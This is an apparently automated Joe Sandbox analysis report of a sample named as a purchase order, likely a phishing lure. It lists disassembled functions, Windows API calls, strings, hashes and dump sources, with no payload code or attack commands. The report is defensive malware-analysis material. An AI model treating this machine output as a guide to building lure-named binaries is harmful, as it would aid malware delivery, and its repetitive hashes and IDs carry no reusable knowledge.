                                                            • API String ID: 1914653954-2746444292
                                                            • Opcode ID: 26a6354b50ed1ae2b8913909961c1f7dd70ed5f9c5f73d3f7e6f3274403e8c7a
                                                            • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                            • Opcode Fuzzy Hash: 26a6354b50ed1ae2b8913909961c1f7dd70ed5f9c5f73d3f7e6f3274403e8c7a
                                                            • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                            Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcsncpy.LIBCMT ref: 0045CE39
                                                            • __wsplitpath.LIBCMT ref: 0045CE78
                                                            • _wcscat.LIBCMT ref: 0045CE8B
                                                            • _wcscat.LIBCMT ref: 0045CE9E
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                            • _wcscpy.LIBCMT ref: 0045CF61
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                            • String ID: *.*
                                                            • API String ID: 1153243558-438819550
                                                            • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                            • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                            • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                            • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                            Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll
                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                            • API String ID: 3832890014-4202584635
                                                            • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                            • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                            • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                            • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                            Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                            • GetFocus.USER32 ref: 0046A0DD
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$CtrlFocus
                                                            • String ID: 0
                                                            • API String ID: 1534620443-4108050209
                                                            • Opcode ID: 00e055a549b125ddc5fd2d23f7dd8ed6e9150fbff2d0b75d7232e964713a8e5e
                                                            • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                            • Opcode Fuzzy Hash: 00e055a549b125ddc5fd2d23f7dd8ed6e9150fbff2d0b75d7232e964713a8e5e
                                                            • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                            Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?), ref: 004558E3
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateDestroy
                                                            • String ID: ,$tooltips_class32
                                                            • API String ID: 1109047481-3856767331
                                                            • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                            • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                            • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                            • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                            Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                            • GetMenuItemCount.USER32(?), ref: 00468C45
                                                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                            • GetMenuItemCount.USER32 ref: 00468CFD
                                                            • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                            • GetCursorPos.USER32(?), ref: 00468D3F
                                                            • SetForegroundWindow.USER32(?), ref: 00468D49
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                            • String ID: 0
                                                            • API String ID: 1441871840-4108050209
                                                            • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                            • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                            • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                            • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                            Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                            • __swprintf.LIBCMT ref: 00460915
                                                            • __swprintf.LIBCMT ref: 0046092D
                                                            • _wprintf.LIBCMT ref: 004609E1
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 3631882475-2268648507
                                                            • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                            • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                            • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                            • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                            Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                            • SendMessageW.USER32 ref: 00471740
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                            • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                            • SendMessageW.USER32 ref: 0047184F
                                                            • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                            • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                            • String ID:
                                                            • API String ID: 4116747274-0
                                                            • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                            • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                            • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                            • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                            Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu$Sleep
                                                            • String ID: 0
                                                            • API String ID: 1196289194-4108050209
                                                            • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                            • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                            • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                            • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                            Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0043143E
                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                            • SelectObject.GDI32(00000000,?), ref: 00431466
                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                            • String ID: (
                                                            • API String ID: 3300687185-3887548279
                                                            • Opcode ID: c041ec31f77b2f21b2023a958713647570c0122b596f6872da4d7c13e5ecc15f
                                                            • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                            • Opcode Fuzzy Hash: c041ec31f77b2f21b2023a958713647570c0122b596f6872da4d7c13e5ecc15f
                                                            • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                            Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                            • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1976180769-4113822522
                                                            • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                            • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                            • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                            • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                            Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                            • String ID:
                                                            • API String ID: 461458858-0
                                                            • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                            • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                            • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                            • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                            Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                            • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                            • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                            • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                            • DeleteObject.GDI32(?), ref: 004301D0
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
